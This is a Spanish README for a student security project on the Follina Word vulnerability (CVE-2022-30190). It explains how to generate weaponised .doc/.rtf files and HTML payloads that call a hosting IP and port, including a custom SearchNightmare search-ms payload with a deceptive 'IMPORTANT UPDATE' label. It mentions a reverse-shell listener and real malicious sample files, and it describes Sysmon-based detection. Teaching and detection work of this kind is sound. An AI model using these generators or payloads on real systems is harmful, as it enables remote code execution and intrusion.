
Un proyecto de ciberseguridad de Fullstack Academy que examina el ciclo completo de la vulnerabilidad Follina (CVE-2022-30190), desde la explotación hasta la detección y la defensa.
Un proyecto de ciberseguridad de Fullstack Academy que examina el ciclo completo de la vulnerabilidad Follina (CVE-2022-30190), desde la explotación hasta la detección y la defensa.
Equipo:
Este conjunto de herramientas asume que tienes un host web o que puedes levantar un servidor web sencillo con Python para alojar los archivos de payload generados o de ejemplo.
Los archivos de la carpeta Example Payloads contienen código malicioso real. Se usaron con máquinas virtuales en una red local y no deberían suponer un problema en una red segura donde confíes en todas las máquinas, pero ten cuidado al usar o modificar estos archivos. Además, los generadores de documentos y payloads obviamente crean sus propios archivos maliciosos. ¡Usa estas herramientas solo en máquinas virtuales u otros entornos desechables! No uses ninguna herramienta de aquí que no entiendas.
Para crear el documento de Microsoft Word con el exploit Follina, ejecuta docgen_v3.py usando las siguientes opciones:
--extention/-e : cambia el formato de salida del documento de .doc (predeterminado) a rtf para un ataque de cero clics. -e rtf--ip_address/-ip : cambia la dirección IP a la que el documento intentará conectarse (por defecto es 10.0.2.15).--port/-p : cambia el puerto al que intentará conectarse (por defecto es 8000).Para crear un archivo html de payload, usa generate_payload.py con el subcomando poc para generar un payload de prueba de concepto que abre la Calculadora de Windows, o el subcomando custom para generar un payload con tu propio script.
Ejemplos:
python generate_payload.py poc -o test.html generará el payload de la calculadora en test.htmlpython generate_payload.py custom -o test.html -p "search-ms:query=procmon.exe&crumb=location:%5C%5Clive.sysinternals.com%5Ctools&displayname=IMPORTANT%20UPDATE" generará test.html como un payload personalizado con el exploit SearchNightmareLos payloads de ejemplo se pueden encontrar en la carpeta "Example Payloads".
La detección de Follina requiere que Sysmon esté instalado para registrar eventos. Nuestros métodos de detección aquí se basan en encontrar casos en los que Microsoft Word llama a MSDT.exe, pero los scripts se pueden modificar para buscar otros artefactos, como los argumentos que Follina usa en su comando de Powershell. Se dispone de las siguientes herramientas:
Todos los archivos de ejemplo docx, rtf y html apuntan a payloads alojados en la dirección IP 10.0.2.15. Además, si quieres usar el exploit de reverse shell, configura un listener en el puerto 9999.